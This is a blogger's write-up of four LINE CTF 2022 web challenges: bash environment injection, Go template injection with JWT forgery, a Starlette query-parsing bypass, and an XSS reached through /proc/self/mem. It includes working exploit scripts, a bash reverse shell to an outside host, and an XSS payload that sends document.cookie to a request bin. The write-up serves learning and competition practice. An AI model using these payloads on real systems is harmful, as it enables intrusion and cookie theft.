LINE CTF 2022 writeup

This one didn't feel too much like being stuck in jail, so this post can actually be called a writeup.

I spent the whole event watching tkmk, an absolute wizard, carry everything while I did odd jobs on the side and learned.

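We solved all four of the easier challenges, and I wasn't in the mood to look at the ones with only one or two solves.
In the end I'm still a scrub who can only do the easy ones.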

bb

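Once again a challenge based on one of p神's articles.
This time bash is handed to you directly, but letters are not allowed. Other than that it is the same kind of command execution.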

<?php
error_reporting(0);

function bye($s, $ptn)
{
    if (preg_match($ptn, $s)) {
        return false;
    }
    return true;
}

foreach ($_GET["env"] as $k => $v) {
    if (bye($k, "/=/i") && bye($v, "/[a-zA-Z]/i")) {
        putenv("{$k}={$v}");
    }
}
system("bash -c 'imdude'");

foreach ($_GET["env"] as $k => $v) {
    if (bye($k, "/=/i")) {
        putenv("{$k}");
    }
}
highlight_file(__FILE__);
?>

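Calling putenv without an equals sign unsets the variable. The variable is gone anyway once the request has been handled, so the extra cleanup seems unnecessary.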

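With letters banned, my first thought was octal, but I fiddled for ages and couldn't get it through... octal failed both locally and remotely. tkmk, on the other hand, said the $'\000' form worked on the first try.
For the moment I was left in the dark.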

So I shamelessly went and asked. The payload is roughly of that form, and he said it can be found in the man page. Let me try.

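I found out why I originally thought it didn't work... In my local test I read the environment variable with PHP's getenv function, which does not expand the value, so I assumed nothing was being expanded. Reading it through system shows that it is in fact expanded. There is also no output, so you have to confirm execution with something like touching a file...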

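BASH_ENV works straight away; BASH_FUNC got no reaction no matter how long I tried.
I also noticed something odd: echoing a bare octal escape like \000 also came out as the decoded character, but only the $'\000' form, wrapped in $ and quotes, is expanded correctly and executes the command.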

Searching for "oct" in the man page makes this syntax easier to find:

Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters replaced as specified by the ANSI C standard. Backslash escape sequences, if present, are decoded as follows:
\nnn the eight-bit character whose value is the octal value nnn (one to three octal digits)
\xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits)
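
To check a payload without running it, the two escape forms quoted above can be decoded offline. This is only a rough sketch in Python that imitates the \nnn and \xHH rules for $'...' words; the helper names are made up for illustration, and it ignores every other escape and all other bash quoting rules.

```python
import re

# One backslash escape: \nnn (1-3 octal digits) or \xHH (1-2 hex digits).
_ESCAPE = re.compile(r"\\([0-7]{1,3})|\\x([0-9a-fA-F]{1,2})")
# One $'...' word whose body contains no single quote.
_ANSI_C_WORD = re.compile(r"\$'([^']*)'")


def decode_escapes(body: str) -> str:
    """Decode \\nnn and \\xHH inside the body of a $'...' word."""
    def repl(m: re.Match) -> str:
        if m.group(1) is not None:
            # Octal form; keep only the low eight bits, as the man page describes.
            return chr(int(m.group(1), 8) & 0xFF)
        return chr(int(m.group(2), 16))
    return _ESCAPE.sub(repl, body)


def expand_ansi_c(word: str) -> str:
    """Replace every $'...' word in the input with its decoded text."""
    return _ANSI_C_WORD.sub(lambda m: decode_escapes(m.group(1)), word)


print(expand_ansi_c("$'\\151'$'\\144'"))
```

Escapes that are not wrapped in $'...' are deliberately left untouched by this helper.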

I threw together a crude script:

import re

payload = "bash -i >& /dev/tcp/www.z3ratu1.cn/10001 0>&1"
result = ""
for c in payload:
    if re.match("[a-zA-Z]", c):
        result += "$'\\" + str(oct(ord(c)))[2:].rjust(3, '0') + "'"
    else:
        result += c
print("$(" + result + ")")

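One more oddity: when I octal-encoded every character it stopped working; only encoding the letters works. Strange. A likely explanation is that everything inside $'...' counts as quoted, so encoded spaces no longer split words and encoded operators such as > and & become literal characters, and bash then treats the whole payload as a single command name.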
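
Putting the pieces together, the request itself can be built like this. A minimal sketch: it encodes only the letters, wraps the result in $(...) and puts it into env[BASH_ENV], since the key is only checked for "=". The function names and the example command are placeholders, and the target URL is left out on purpose.

```python
import re
from urllib.parse import urlencode


def encode_letters(cmd: str) -> str:
    """Replace each ASCII letter with $'\\ooo' and wrap the result in $(...)."""
    out = []
    for ch in cmd:
        if re.match(r"[a-zA-Z]", ch):
            out.append("$'\\%03o'" % ord(ch))
        else:
            # Spaces and shell operators stay unquoted so bash still parses them.
            out.append(ch)
    return "$(" + "".join(out) + ")"


def build_query(cmd: str) -> str:
    """Build the query string that sets BASH_ENV to the encoded command."""
    value = encode_letters(cmd)
    if re.search(r"[a-zA-Z]", value):
        raise ValueError("value would be rejected by the letter filter")
    return urlencode({"env[BASH_ENV]": value})


# Example command is hypothetical; there is no output, so leave a marker file.
print(build_query("touch /tmp/marker"))
```

The printed string is appended after "?" on the challenge URL.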

LINECTF{well..what_do_you_think_about}

gotm

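Something odd written in Go, and I can barely read Go to begin with... At first I thought the target was Go's JWT library, and I even found a vulnerability that seemed to match the version, but its description didn't really fit the situation. In the end it turned out there is a bare template injection (at first I wondered why the JWT secret was stored in the user account; it is there so that Go's low-impact template injection can leak it).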

func root_handler(w http.ResponseWriter, r *http.Request) {
    token := r.Header.Get("X-Token")
    if token != "" {
        id, _ := jwt_decode(token)
        acc := get_account(id)
        tpl, err := template.New("").Parse("Logged in as " + acc.id)
        if err != nil {
        }
        tpl.Execute(w, &acc)
    } else {

        return
    }
}

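The string is already concatenated directly here, so there is no need to render it as a template at all. In short, this is really terrible code: use the template injection to read the secret, then forge a JWT.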

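At first {{.pw}} gave me nothing; then {{.}} dumped every field and that was it... Presumably this is because Go templates cannot access unexported (lowercase) fields by name, while {{.}} prints the whole struct.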
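
Once the secret has leaked, forging the token is just an HMAC. A minimal standard-library sketch, assuming the service signs with HS256; the claim names and the secret below are placeholders, and the real claims have to be read from the challenge's jwt_decode.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_hs256(claims: dict, secret: str) -> str:
    """Sign an arbitrary claim set with a known secret (HS256 assumed)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    signature = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(signature)


# Hypothetical claims and secret, for illustration only.
print(forge_hs256({"id": "someone", "is_admin": True}, "leaked-secret"))
```

The resulting token goes into the X-Token header that root_handler reads.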

Memo Drive

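Didn't look at it; it was solved before I even got online.
I didn't understand tkmk's one-line explanation of the instant solve either. After the CTF I looked up a writeup and found it is not that simple: you have to read the source to understand why it works.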

This is all the relevant code. This time it isn't the classic Flask but the somewhat more niche Starlette.

def view(request):
    context = {}

    try:
        context['request'] = request
        clientId = getClientID(request.client.host)

        if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
            raise
        
        filename = request.query_params[clientId]
        path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
        
        f = open(path, 'r')
        contents = f.readlines()
        f.close()
        
        context['filename'] = filename
        context['contents'] = contents
    
    except:
        pass
    
    return templates.TemplateResponse('/view/view.html', context)

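Bypassing the query and query_params checks gets a bit magical. One trick is to use ; instead of & as the separator, which still yields two values in query_params. The other is to add a # to the Host header of the HTTP request, which leaves request.url.query empty...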

Put like that it sounds like pure magic; you need to look at the source to see how it is actually implemented.

I'll just link someone else's article:
https://github.com/aszx87410/huli-blog/blob/master/source/_posts/linectf-2022-writeup.md

The # trick works because the URL is assembled like this:
url = f"{scheme}://{host_header}{path}"
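url.query is then parsed from this URL, so everything after the # is treated as the fragment (hash). query_params, however, does not come from url; it is parsed separately and so still works as normal.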
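
The effect of the # is easy to reproduce offline. A small sketch, assuming the rebuilt URL is split roughly the way Python's urllib.parse.urlsplit does it; the host name and the query key are made up.

```python
from urllib.parse import urlsplit


def rebuilt_url(scheme: str, host_header: str, path_and_query: str) -> str:
    """Mimic the f-string above: the Host header is pasted in unchanged."""
    return f"{scheme}://{host_header}{path_and_query}"


# Hypothetical host and query, for illustration only.
normal = urlsplit(rebuilt_url("http", "memo.example", "/view?id=flag"))
tricked = urlsplit(rebuilt_url("http", "memo.example#", "/view?id=flag"))

print(repr(normal.query))      # the query is visible to the filter
print(repr(tricked.query))     # empty: nothing left for the filter to inspect
print(repr(tricked.fragment))  # path and query ended up in the fragment
```

With the trailing # in the Host value, the '&' and '.' checks on the URL query have nothing to look at, while the separately parsed query_params still carries the real parameters.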

Online library

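The code is weird as hell. At first I stared for ages at one odd spot that felt like the attack surface, then concluded it could not be bypassed. Then I looked at another odd spot that seemed to allow a strange attack, but I didn't know how to pull it off. After I wrote it up in Polaris, tkmk solved it instantly.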

An XSS challenge, with two XSS points in total.

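The first one requires a POST, but the cookie is set without any attributes, which means cross-site POSTs still carry it for the first two minutes. However, the response overwrites the cookie first. At the time I guessed there might be some sync/async trick to send the flag out before that script runs.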

app.post("/insert", (req: Express.Request, res: Express.Response): void => {
    if (
        typeof req.body.title === "string" &&
        req.body.title.length < 30 &&
        typeof req.body.content === "string" &&
        req.body.content.length < 1024 * 256
    ) {
        res.end(`<script>document.cookie = 'FLAG=REMOVED'</script><h1>${req.body.title}</h1><hr/>` + req.body.content);
    } else {
        res.end("Something wrong with your book title or contents.");
    }
});

The bot code:

(async (): Promise<void> => {
    while (true) {
        const [error, data]: Array<string> = await redis.blpop("query", 0)
        if (data && data.startsWith("/") && Url.parse("http://web" + data).host === "web") {
            console.log("> Start to process - http://web" + data)
            await(
                async (url: string): Promise<void> => {
                const bot: Puppeteer.Browser = await Puppeteer.launch({
                    product: "chrome",
                    headless: true,
                    ignoreHTTPSErrors: true,
                    args: ["--no-sandbox"]
                })
                const page: Puppeteer.Page = await bot.newPage();
                await page.setCookie({
                    domain: "web",
                    name: "FLAG",
                    value: process.env.FLAG
                })
                await page.goto(url, {
                    timeout: 10000
                }).catch((error: Error): void => {
                    console.error(error)
                })
                await page.close()
                await bot.close()
            })("http://web" + data);
            console.log("> Job Done.")
        } else {
            console.error("> Invalid path.")
        }
    }
})();

So the question is how to get past the data.startsWith("/") && Url.parse("http://web" + data).host === "web" check.

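One thing is odd here: why force data.startsWith("/")? Normally you would just append a slash after the prepended web. It felt suspicious, so I spent ages trying Unicode and similar tricks.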

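Then I realized startsWith obviously cannot be bypassed. So could the input start with a slash, have its host parsed as web, and still make the browser visit somewhere else?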

Tried for ages again; no idea...

Then I started looking at the other XSS point.

app.get("/:t/:s/:e", (req: Express.Request, res: Express.Response): void => {
    const s: number = Number(req.params.s)
    const e: number = Number(req.params.e)
    const t: string = req.params.t

    if ((/[\x00-\x1f]|\x7f|\<|\>/).test(t)) {
        res.end("Invalid character in book title.")
    } else  {
        Fs.stat(`public/${t}`, (err: NodeJS.ErrnoException, stats: Fs.Stats): void => {
            if (err) {
                res.end("No such a book in bookself.")
            } else {
                if (s !== NaN && e !== NaN && s < e) {
                    if ((e - s) > (1024 * 256)) {
                        res.end("Too large to read.")
                    } else {
                        Fs.open(`public/${t}`, "r", (err: NodeJS.ErrnoException, fd: any): void => {
                            if (err || typeof fd !== "number") {
                                res.end("Invalid argument.")
                            } else {
                                let buf: Buffer = Buffer.alloc(e - s);
                                Fs.read(fd, buf, 0, (e - s), s, (err: NodeJS.ErrnoException, bytesRead: number, buf: Buffer): void => {
                                    res.end(`<h1>${t}</h1><hr/>` + buf.toString("utf-8"))
                                })
                            }
                        })
                    }
                } else {
                    res.end("There isn't size of book.")
                }
            }
        })
    }
});

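The title is controllable but cannot be used for XSS. What remains is a read at a chosen offset and length (from s to e), and the file must exist. A quick test showed that directory traversal works, so I started reading /proc.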

I read and read and got nowhere. Things like cmdline were useless, and the challenge source has nothing else to work with either.

Then I saw this code:

app.post("/identify", (req: Express.Request, res: Express.Response): void => {
    res.set("Content-Type", "application/json");
    if (!req.session.username) {
        if (typeof req.body.username === "string" && req.body.username.length < 100) {
            req.session.username = req.body.username
            total.push(req.body.username)
            res.json({
                error: false,
                message: "Identified successfully."
            })
        } else {
            res.json({
                error: true,
                message: "Username is invalid or too long."
            })
        }
    } else {
        res.json({
            error: true,
            message: "You are already identified as " + req.session.username
        })
    }
});

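total is a global variable here, so it should stay resident in memory. The idea is to read /proc/self/maps for the memory layout and then read mem. I didn't know this at first and read mem directly, which returned nothing.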

And then tkmk the wizard solved it in no time. Too strong.

The next day I got up to reproduce it, and also asked 枢子哥 what the maps file means.

00400000-04899000 r-xp 00000000 08:01 545155                             /usr/local/bin/node
04a99000-04a9c000 r--p 04499000 08:01 545155                             /usr/local/bin/node
04a9c000-04ab4000 rw-p 0449c000 08:01 545155                             /usr/local/bin/node
04ab4000-04ad5000 rw-p 00000000 00:00 0 
053d6000-0631d000 rw-p 00000000 00:00 0                                  [heap]
1eeb580000-1eeb5c0000 rw-p 00000000 00:00 0 
1024e680000-1024e6c0000 rw-p 00000000 00:00 0 
12654840000-12654880000 ---p 00000000 00:00 0 
15b65f40000-15b65f80000 rw-p 00000000 00:00 0 
18a12480000-18a124c0000 ---p 00000000 00:00 0 
1c64e2c0000-1c64e300000 ---p 00000000 00:00 0 
1d3c5dc0000-1d3c5e00000 rw-p 00000000 00:00 0 
1eac5b80000-1eac5bc0000 rw-p 00000000 00:00 0 
2f64ce80000-2f64cec0000 ---p 00000000 00:00 0 
317d9d00000-317d9d40000 ---p 00000000 00:00 0 
5088eb00000-5088eb40000 rw-p 00000000 00:00 0 
563aeb00000-563aeb40000 ---p 00000000 00:00 0 
5b7b9dc0000-5b7b9e00000 ---p 00000000

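Normally there would be load addresses for some dynamically linked .so libraries (code segments and so on), but here there is only the node binary, so never mind that. The address range marked [heap] is the heap, so the plan is to try to recover the variable from there.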
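
Picking the heap range out of a maps dump is just field splitting. A small sketch with a hypothetical helper name; the sample lines are copied from the listing above.

```python
from typing import Optional, Tuple

SAMPLE_MAPS = """\
00400000-04899000 r-xp 00000000 08:01 545155                             /usr/local/bin/node
04ab4000-04ad5000 rw-p 00000000 00:00 0 
053d6000-0631d000 rw-p 00000000 00:00 0                                  [heap]
1eeb580000-1eeb5c0000 rw-p 00000000 00:00 0 
"""


def find_region(maps_text: str, label: str = "[heap]") -> Optional[Tuple[int, int]]:
    """Return (start, end) of the first mapping whose name equals label."""
    for line in maps_text.splitlines():
        fields = line.split()
        # Named mappings have six fields: range, perms, offset, dev, inode, name.
        if len(fields) >= 6 and fields[5] == label:
            start_hex, end_hex = fields[0].split("-")
            return int(start_hex, 16), int(end_hex, 16)
    return None


region = find_region(SAMPLE_MAPS)
if region is not None:
    print("heap: {:#x}-{:#x}".format(*region))
```

Anonymous mappings and truncated lines have fewer than six fields, so they are skipped.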

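I wrote a garbage script to brute-force it (one pitfall: re.match only matches at the start of the string... you need re.search; that one cost me a long time...):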

import re
import requests

maps = "http://35.243.100.112/..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmaps/300/400"
res = requests.get(maps)
# print(res.text)
groups = re.search(r"0([a-f0-9]+?)-0([a-f0-9]+?) rw-p 00000000 00:00 0\s+\[heap]", res.text)
start = int("0x"+groups.group(1), 16)
end = int("0x"+groups.group(2), 16)
print("[+]start: {}".format(start))
print("[+]end: {}".format(end))
step = 1024 * 128


url = "http://35.243.100.112/..%2f..%2f..%2f..%2f..%2fproc%2fself%2fmem/{}/{}"
payload = "<script>fetch('https://requestbin.z3ratu1.cn?'+document.cookie);</script>"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = "username="+payload
for i in range(10):
    identify = "http://35.243.100.112/identify"
    requests.post(identify, headers=headers, data=data)

prefix = "<h1>../../../../../proc/self/mem</h1><hr/>"

while start < end:
    res = requests.get(url.format(start, start+step))
    index = res.text.find(payload)
    if index != -1:
        print("[+]found: "+url.format(start, start+step))
        # break
    start += step
    print("{}, remaining {}".format(start, end-start))
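
The re.match pitfall mentioned before the script can be shown in isolation. A tiny sketch on two lines taken from the maps listing; the pattern here is a simplified stand-in, not the one used in the script.

```python
import re

MAPS_TEXT = (
    "00400000-04899000 r-xp 00000000 08:01 545155                             /usr/local/bin/node\n"
    "053d6000-0631d000 rw-p 00000000 00:00 0                                  [heap]\n"
)
PATTERN = r"([0-9a-f]+)-([0-9a-f]+) rw-p \S+ \S+ \d+\s+\[heap\]"

# re.match only tries position 0, where the r-xp line of the node binary sits.
print(re.match(PATTERN, MAPS_TEXT))

# re.search scans forward and finds the [heap] line further down.
found = re.search(PATTERN, MAPS_TEXT)
print(found.group(1), found.group(2))
```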

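The hits always seemed to be the HTTP request rather than the variable, and the location of the HTTP request keeps changing, so it was not very stable. After commenting out the break I found several later occurrences, which may be where the variable actually lives? Then I submitted one to the bot and it went through.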
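
A separate possible source of misses, which I did not verify during the CTF, is a payload that straddles two chunks. A minimal sketch of overlapping windows that would cover that case; the function name is made up, and the overlap should be at least len(payload) - 1.

```python
from typing import Iterator, Tuple


def windows(start: int, end: int, step: int, overlap: int) -> Iterator[Tuple[int, int]]:
    """Yield (lo, hi) ranges of at most step bytes that overlap by overlap bytes."""
    if not 0 <= overlap < step:
        raise ValueError("overlap must be in [0, step)")
    pos = start
    while pos < end:
        stop = min(pos + step, end)
        yield pos, stop
        if stop == end:
            break
        # Step back by the overlap so a payload cut at the boundary is seen whole.
        pos += step - overlap


for lo, hi in windows(0, 10, 4, 1):
    print(lo, hi)
```

In the script above this would replace the plain start += step loop, keeping step below the server's 1024 * 256 read limit.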

Not a very web-like challenge, but learning a bit about memory and the like can't hurt.

FLAG=LINECTF{705db4df0537ed5e7f8b6a2044c4b5839f4ebfa4}